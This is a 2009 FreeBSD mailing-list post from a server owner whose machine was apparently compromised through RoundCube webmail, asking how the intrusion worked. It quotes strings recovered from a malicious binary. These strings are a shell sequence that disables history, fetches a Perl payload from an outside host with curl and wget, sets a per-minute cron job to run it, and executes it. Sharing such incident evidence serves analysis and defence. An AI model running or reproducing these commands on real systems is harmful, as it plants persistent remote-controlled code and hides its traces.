what www perl script is running?
Colin Brace
cb at lim.nl
Thu Aug 27 09:52:03 UTC 2009
Colin Brace wrote:
>
> ahhhhh, another directory found in /tmp with files written by www called
> .bash/ Contents here:
>
> http://silenceisdefeat.com/~cbrace/www_badstuff-3.gz
>
Apropos of the contents of the above, a correspondent writes:
[...]
running 'strings' on /tmp/owned will show
"HISTFILE=/dev/null
cd /tmp;curl -s -O http://www.tirnaveni.org/tmpfile 2>&1 >/dev/null
cd /tmp;wget -b http://www.tirnaveni.org/tmpfile 2>&1 >/dev/null
echo '*/1 * * * * perl /tmp/tmpfile' >cron.job
crontab cron.job
rm -rf cron.job
chmod 0100 /tmp/tmpfile 2>&1 >/dev/null
perl /tmp/tmpfile 2>&1 >/dev/null"
[...]
So this would be the original mischief-maker.
Just out of curiousity, can someone explain to me in basic terms how an
intruder exploits a vulnerability such as apparently existed on my system
(the RoundCube webmail package was apparently the culprit) to place the
binary file "owned" in /tmp and execute it?
Thanks
-----
Colin Brace
Amsterdam
http://lim.nl
--
View this message in context: http://www.nabble.com/what-www-perl-script-is-running--tp25112050p25167487.html
Sent from the freebsd-questions mailing list archive at Nabble.com.
More information about the freebsd-questions
mailing list